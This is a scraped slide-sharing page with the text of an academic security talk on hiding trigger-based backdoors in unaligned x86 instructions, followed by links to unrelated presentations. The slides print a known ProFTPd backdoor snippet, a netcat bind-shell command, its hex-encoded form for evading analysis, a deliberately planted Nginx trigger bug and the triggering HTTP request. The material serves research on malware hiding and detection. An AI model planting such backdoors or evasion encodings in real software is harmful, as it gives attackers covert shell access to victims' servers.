instruction level steganography for covert trigger based
play

Instruction-Level Steganography for Covert Trigger-Based Malware - PowerPoint PPT Presentation

Jan 01, 2023 •442 likes •586 views

Instruction-Level Steganography for Covert Trigger-Based Malware Dennis Andriesse and Herbert Bos VU University Amsterdam DIMVA 2014 Introduction Trigger-Based Malware Trigger-based malware (TBM) remains dormant until a specific trigger E.g.

  1. Instruction-Level Steganography for Covert Trigger-Based Malware Dennis Andriesse and Herbert Bos VU University Amsterdam DIMVA 2014

  2. Introduction Trigger-Based Malware Trigger-based malware (TBM) remains dormant until a specific trigger E.g. backdoors, targeted malware Triggers are environment params, timeouts, network messages, . . . Example: ProFTPd v1.3.3c Backdoor if(strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh; /sbin/sh"); } Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 1 / 13

  3. Introduction Code Hiding for Trigger-Based Malware Trigger-based malware must remain undetected over the long term Current detection techniques look for unexercised code paths We develop a method for hiding TBM from static/dynamic analysis if(trigger) jmp backdoor; Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 2 / 13

  4. Running Example Running Example: Covert Nginx Backdoor We hide a shell-spawning covert backdoor in Nginx 1.5.8 To do this, we need a covert control transfer to the backdoor We also need to hide the backdoor code itself if(trigger) jmp backdoor; Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 3 / 13

  5. Running Example Running Example: Covert Nginx Backdoor We hide a shell-spawning covert backdoor in Nginx 1.5.8 To do this, we need a covert control transfer to the backdoor We also need to hide the backdoor code itself if(trigger) jmp backdoor; Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 4 / 13

  6. Hiding Code Unaligned instructions We hide code by embedding it in unaligned instructions Supported on variable-length instruction sets (like x86) Disassembly shows only aligned code, not unaligned Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 5 / 13

  7. Hiding Code Generating Unaligned Code Our prototype tool hides unaligned x86 code in a host program using several heuristics (1) The hidden malcode does not show up in aligned disassembly (2) The spurious code that does show up contains only common instructions (arithmetic, logic, jmp, . . . ) (3) Large immediates are avoided if possible Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 6 / 13

  8. Hiding Code Example: Nginx Backdoor in Unaligned Code As an example, we convert the following backdoor to unaligned code Backdoor opens a shell on TCP port 1797 1 push "nc -le/bin/sh -p1797" 2 call system@plt Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 7 / 13

  9. Hiding Code Example: Nginx Backdoor in Unaligned Code We first preprocess the code to avoid string constants 1 push 0x00000000 ; terminating NULL 2 push 0x37393731 ; 1797 3 push 0x702d2068 ; h -p 4 push 0x732f6e69 ; in/s 5 push 0x622f656c ; le/b 6 push 0x2d20636e ; nc - 7 push esp ; pointer to cmd string 8 call system@plt ; call system(cmd) Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 8 / 13

  10. Hiding Code Example: Nginx Backdoor in Unaligned Code Each instruction is hidden in a spurious code fragment Control between fragments is guided by indirect jumps Example Fragment (see paper for full example) Opcode Disassembled Hidden 7f 68 jg $+0x6a push 0x37393731 31 37 xor [edi],esi jz $+0x64 39 37 cmp [edi],esi add al,0x88 74 62 jz $+0x64 jmp ecx 04 88 add al,0x88 ff e1 jmp ecx Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 9 / 13

  11. Covert Control Transfers Trigger Bugs We use crafted trigger bugs to implement covert control transfers Only triggered on expected input (environment parameter, network message, . . . ) Completely implicit, no control-flow edge ◮ Hidden even under dynamic analysis No crash on non-trigger inputs Example: Nginx Corrupted Request Bug In our Nginx example, we use a bug which triggers upon a specially crafted HTTP request Summary in next slides, full explanation in paper Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 10 / 13

  12. Covert Control Transfers Nginx Trigger Bug ngx_int_t ngx_http_parse_header_line(/* ... */) { u_char badc; /* last bad character */ ngx_uint_t hash; /* hash of header, same size as pointer */ /* ... */ } void ngx_http_finalize_request(ngx_http_request_t *r, ngx_int_t rc) { uint8_t have_err; /* overlaps badc */ void (*err_handler)(ngx_http_request_t *r); /* overlaps hash */ if(r->err_handler) { /* never true */ have_err = 1; err_handler = r->err_handler; } if(rc == NGX_HTTP_BAD_REQUEST && have_err == 1 && err_handler) { err_handler(r); /* points to hidden code, set by trigger */ } } void ngx_http_process_request_headers(/* ... */) { rc = ngx_http_parse_header_line(/* ... */); ngx_http_finalize_request(r, NGX_HTTP_BAD_REQUEST); /* bad header */ } Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 11 / 13

  13. Covert Control Transfers Nginx Trigger Input GET / HTTP/1.1 Host: www.victim.org Hthnb\x01 Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 12 / 13

  14. Conclusion We introduce a new technique for hiding trigger-based malware in benign binaries Stealthy against both static and dynamic analysis Current discovery techniques which analyze unexercised code do not detect our technique Dennis Andriesse (VU Amsterdam) Instruction-Level Steganography DIMVA 2014 13 / 13

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography

Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography

Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography for covert channels and device fingerprinting Steven J. Murdoch and Stephen Lewis http://www.cl.cam.ac.uk/users/ { sjm217 , srl32 } Computer

1.12k views • 37 slides
Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography

Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography

Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography for covert channels and device fingerprinting Steven J. Murdoch and Stephen Lewis http://www.cl.cam.ac.uk/users/ { sjm217 , srl32 } Computer

915 views • 36 slides
Hiding in Plain Sight Advances in Malware Covert Communication Channels Pierre-Marc Bureau

Hiding in Plain Sight Advances in Malware Covert Communication Channels Pierre-Marc Bureau

Hiding in Plain Sight Advances in Malware Covert Communication Channels Pierre-Marc Bureau Christian Dietrich Outline 1. Covert Channels 2. Steganography a. Lurk b. Gozi c. Stegoloader 3. Inconspicuous Carrier Protocols a.

674 views • 49 slides
High Level Trigger Chunhua Li The University of Melbourne TRG/DAQ workshop BINP, Novosibirsk

High Level Trigger Chunhua Li The University of Melbourne TRG/DAQ workshop BINP, Novosibirsk

High Level Trigger Chunhua Li The University of Melbourne TRG/DAQ workshop BINP, Novosibirsk Sep. 5-7, 2016 1 HLT Physics Trigger: suppress event rates from 30 kHz to 10 kHz PXD RoI: provide HLT trigger result and tracking

472 views • 20 slides
Data Analysis at CMS Level-1 Trigger Zhenbin Wu (University of

Data Analysis at CMS Level-1 Trigger Zhenbin Wu (University of

Data Analysis at CMS Level-1 Trigger Zhenbin Wu (University of Illinois at Chicago) -- On behalf of the CMS Collaboration 8/2/17 DPF 2017 1 CMS Trigger

771 views • 14 slides
A track finding algorithm based on A track finding algorithm based on pixel detector for the

A track finding algorithm based on A track finding algorithm based on pixel detector for the

A track finding algorithm based on A track finding algorithm based on pixel detector for the ATLAS pixel detector for the ATLAS second level trigger second level trigger Andrea Bar at ella Mauro Dameri - Paolo Moret t ini Fabrizio

352 views • 16 slides
Instruction-Level Parallelism (ILP) Fine-grained parallelism Obtained by: instruction

Instruction-Level Parallelism (ILP) Fine-grained parallelism Obtained by: instruction

Instruction-Level Parallelism (ILP) Fine-grained parallelism Obtained by: instruction overlap in a pipeline executing instructions in parallel (later, with multiple instruction issue) ILP hindered by: data dependence : arises

340 views • 21 slides
UYR Second level Third level Under Your Radar Fourth level Fifth level

UYR Second level Third level Under Your Radar Fourth level Fifth level

Click to edit Master title style Click to edit Master text styles UYR Second level Third level Under Your Radar Fourth level Fifth level Covert Channel & Exfiltration Ali Hadi / Mariam Khader Princess Sumaya

277 views • 25 slides
Abusing hardware for fun and profit Agenda Cache-based Covert channels w/ demo Spectre

Abusing hardware for fun and profit Agenda Cache-based Covert channels w/ demo Spectre

Abusing hardware for fun and profit Agenda Cache-based Covert channels w/ demo Spectre and Meltdown from covert channels Process isola8on + OS (CS 423) OS paging OS services 0x00000000 Communica<on to other processes

568 views • 15 slides
Instruction Selection Aslan Askarov aslan@cs.au.dk Partially based on slides by E. Ernst Where

Instruction Selection Aslan Askarov aslan@cs.au.dk Partially based on slides by E. Ernst Where

Compilation 2016 Instruction Selection Aslan Askarov aslan@cs.au.dk Partially based on slides by E. Ernst Where are we? High-level source code Translation to Lexing/Parsing Semantic analysis LLVM-- IR Low-level target

504 views • 26 slides
Steganography Implementation & Detection Robert Krenn rkrenn@xidc.nl January 21, 2004

Steganography Implementation & Detection Robert Krenn rkrenn@xidc.nl January 21, 2004

Steganography Implementation & Detection Robert Krenn rkrenn@xidc.nl January 21, 2004 Overview What is steganography? Implementations Detection Defeating steganography Conclusion Questions What is steganography?

488 views • 34 slides
Steganography with Public-Key Cryptography for Videoconference XXX CNMAC - Set/2007 Fbio

Steganography with Public-Key Cryptography for Videoconference XXX CNMAC - Set/2007 Fbio

Steganography with Public-Key Cryptography for Videoconference XXX CNMAC - Set/2007 Fbio Borges de Oliveira Steganography with Public-Key Cryptography for Videoconference p.1/26 Steganography Source: Steganography: Steganography with

786 views • 34 slides
Covert Audio Technical Surveillance BURST & TMVWB Systems 1 LJM Tech. Support ! 1 Why

Covert Audio Technical Surveillance BURST & TMVWB Systems 1 LJM Tech. Support ! 1 Why

2013 Conference Covert Audio Technical Surveillance BURST & TMVWB Systems 1 LJM Tech. Support ! 1 Why this presentation ? A typical example of ex. Gov Stuff State level threat some years ago. Now Coporate level Very good

877 views • 32 slides
Instruction Set Design Instruction Set Architecture: to what purpose? ISA provides the level

Instruction Set Design Instruction Set Architecture: to what purpose? ISA provides the level

Instruction Set Design Instruction Set Architecture: to what purpose? ISA provides the level of abstraction between the software and the hardware One of the most important abstraction in CS Its narrow, well-defined, and mostly

401 views • 39 slides
Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview

Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview

Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview Instruction level parallelism Dynamic Scheduling Techniques D namic Sched ling Techniq es Scoreboarding Tomasulos Algorithm

611 views • 36 slides
Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview

Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview

Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview Instruction level parallelism Dynamic Scheduling Techniques Scoreboarding Tomasulos Algorithm Reducing Branch Cost with Dynamic

507 views • 18 slides
Lattice polynomial functions and their use in qualitative decision making AAA83 . . . . .

Lattice polynomial functions and their use in qualitative decision making AAA83 . . . . .

. . Lattice polynomial functions and their use in qualitative decision making AAA83 . . . . . Miguel Couceiro Jointly with D. Dubois, J.-L. Marichal, T. Waldhauser, . . . University of Luxembourg March 2012 Decision making DM Main

1.09k views • 69 slides
Analogy-Based Preference Learning with Kernels Mohsen Ahmadi Fahandar , Eyke Hllermeier

Analogy-Based Preference Learning with Kernels Mohsen Ahmadi Fahandar , Eyke Hllermeier

Analogy-Based Preference Learning with Kernels Mohsen Ahmadi Fahandar , Eyke Hllermeier Intelligent Systems and Machine Learning Group Heinz Nixdorf Institute and Department of Computer Science Paderborn University KI 2019, Wednesday,

496 views • 22 slides
What is DEL good for? Alexandru Baltag Oxford University Copenhagen 2010 ESSLLI 2 DEL is a

What is DEL good for? Alexandru Baltag Oxford University Copenhagen 2010 ESSLLI 2 DEL is a

Copenhagen 2010 ESSLLI 1 What is DEL good for? Alexandru Baltag Oxford University Copenhagen 2010 ESSLLI 2 DEL is a Method, Not a Logic! I take Dynamic Epistemic Logic () to refer to a general type of logical approach to information change ,

751 views • 49 slides
A Three-Stage Experimental Test of Revealed Preference Peter J. Hammond, with Stefan Traub

A Three-Stage Experimental Test of Revealed Preference Peter J. Hammond, with Stefan Traub

Introduction GARP Experiment Statistical Results A Three-Stage Experimental Test of Revealed Preference Peter J. Hammond, with Stefan Traub (Bremen) 26th November 2010 Workshop on Revealed Preference, Paris Dauphine, 26 November 2010 1/ 41

1.29k views • 88 slides
Deploying Dynamic Analyses and Preventing Compiler Backdoors with Multi-Version Execution Lus

Deploying Dynamic Analyses and Preventing Compiler Backdoors with Multi-Version Execution Lus

Deploying Dynamic Analyses and Preventing Compiler Backdoors with Multi-Version Execution Lus Pina l.pina@imperial.ac.uk Joint work with Cristian Cadar , Anastasios Andronidis , and John Regehr Imperial College London, UK University of

945 views • 72 slides
Stringer: Measuring the Importance of Static Data Comparisons to Detect Backdoors and

Stringer: Measuring the Importance of Static Data Comparisons to Detect Backdoors and

Stringer: Measuring the Importance of Static Data Comparisons to Detect Backdoors and Undocumented Functionality Sam L. Thomas , Tom Chothia, Flavio D. Garcia School of Computer Science University of Birmingham Birmingham United Kingdom B15

700 views • 42 slides
HOMSC14 WG-5, Low Level RF, Controls and System Integra@on

HOMSC14 WG-5, Low Level RF, Controls and System Integra@on

HOMSC14 WG-5, Low Level RF, Controls and System Integra@on Brian Chase, Larry DooliEle Familiar block diagram Common to LLRF and Instrumenta@on

628 views • 9 slides
Lecture 8 Backward Induction 14.12 Game Theory Muhamet Yildiz 1 Road Map 1. Backward Induction

Lecture 8 Backward Induction 14.12 Game Theory Muhamet Yildiz 1 Road Map 1. Backward Induction

Lecture 8 Backward Induction 14.12 Game Theory Muhamet Yildiz 1 Road Map 1. Backward Induction 2. Examples 3. Application: Stackelberg Duopoly 4. [Next Application: Negotiation] 2 Definitions Perfect-Information game is a game in which all

331 views • 11 slides

More recommend